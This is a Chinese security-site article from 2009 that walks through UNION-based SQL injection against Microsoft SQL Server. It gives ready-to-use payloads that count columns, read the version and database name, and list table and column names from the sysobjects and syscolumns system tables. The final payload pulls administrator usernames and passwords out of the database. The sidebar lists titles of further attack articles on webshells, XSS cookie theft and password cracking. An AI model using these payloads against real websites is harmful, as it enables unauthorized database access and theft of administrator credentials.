首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
MSSQL下用UNION和系统表配合猜表名和字段名深度注入
来源:http://hi.baidu.com/0soul 作者:zerosoul 发布时间:2009-07-01  
Author:零魂(zerosoul)
Blog: http://hi.baidu.com/0soul
转载请带上版权。

这是这次出攻防大赛题目的时候顺便做的一些注入总结,是我通过查询系统表结构总结出来的。只要注入点有效,并且没有过滤单引号,即使它管理员表名和字段名设置的再复杂都是可以猜出来的,而且由于是用union,效率还是很高的。还有只需要DBO权限即可。

以一个数字型注入点为例( 暂时假设这个数字型注入点对单引号也没有过滤)

先用 order by 猜SQL所查询字段数,并用Union验证(这里直接Select当前数据库下的sysobjects系统表)


ID=735 order by 8
ID=-735 union select 1,2,3,4,5,6,7,8 from sysobjects
或者
ID=-735 union select 1,2,3,4,5,6,7,8 from master.dbo.sysobjects

假如这里屏幕上会显示2,3,4
顺便查下版本和数据库名

ID=-735 union select 1,@@version,db_name(),4,5,6,7,8 from sysobjects

//这里假如查出当前数据库名dbname

接着查询表名(从0开始增加第二个top N的数字就可以遍历当前数据库表名了)

ID=-735 union select 1,2,(select top 1 name from sysobjects where xtype='u' and name not in(select top 0 name from sysobjects where xtype='u')),4,5,6,7,8 from sysobjects

如果要查其他数据库的表名还可以这样:

ID=-735 union select 1,2,(select top 1 name from [dbname]..sysobjects where xtype='u' and name not in(select top 0 name from [dbname]..sysobjects where xtype='u')),4,5,6,7,8 from sysobjects

//这里假如查出管理员表admin

继续猜字段名(从0开始增加第二个top N的数字就可以遍历admin表的字段名了)

ID=-735 union select 1,2,(select top 1 name from syscolumns where id in (select id from sysobjects where name='admin') and name not in (select top 2 name from syscolumns where id in (select id from sysobjects where name='admin'))),4,5,6,7,8 from sysobjects

//这里假如查到的管理员用户名和密码字段分别是name和psw

剩下的就简单啦,依次把管理员用户名和密码就可以Union出来了(仍然修改第二个top N来遍历字段)


//这里假设使用的是前面已经猜出来的表名admin和字段name,psw
ID=-735 union select top 1 1,name,psw,4,5,6,7,8 from admin where name not in (select top 0 name from admin)


加一张关于系统表的截图:

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·MSSQL注入利用Group by&having猜
·利用cpl文件在xp中留一个后门
·拿下PHPBB.com的过程(老外写的
·跨站脚本XSS
·AspProductCatalog漏洞分析与利
·0day openssh remote exploit
·渗透利器:强大的溢出工具包--Me
·通过SQL SERVER远程上传文件的实
·The Art of Grey-Box Attack
·Discuz! 7.0 及以下版本后台拿we
·各类型数据库注入时的一些语句
·再说两种ecshop后台拿shell的方
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved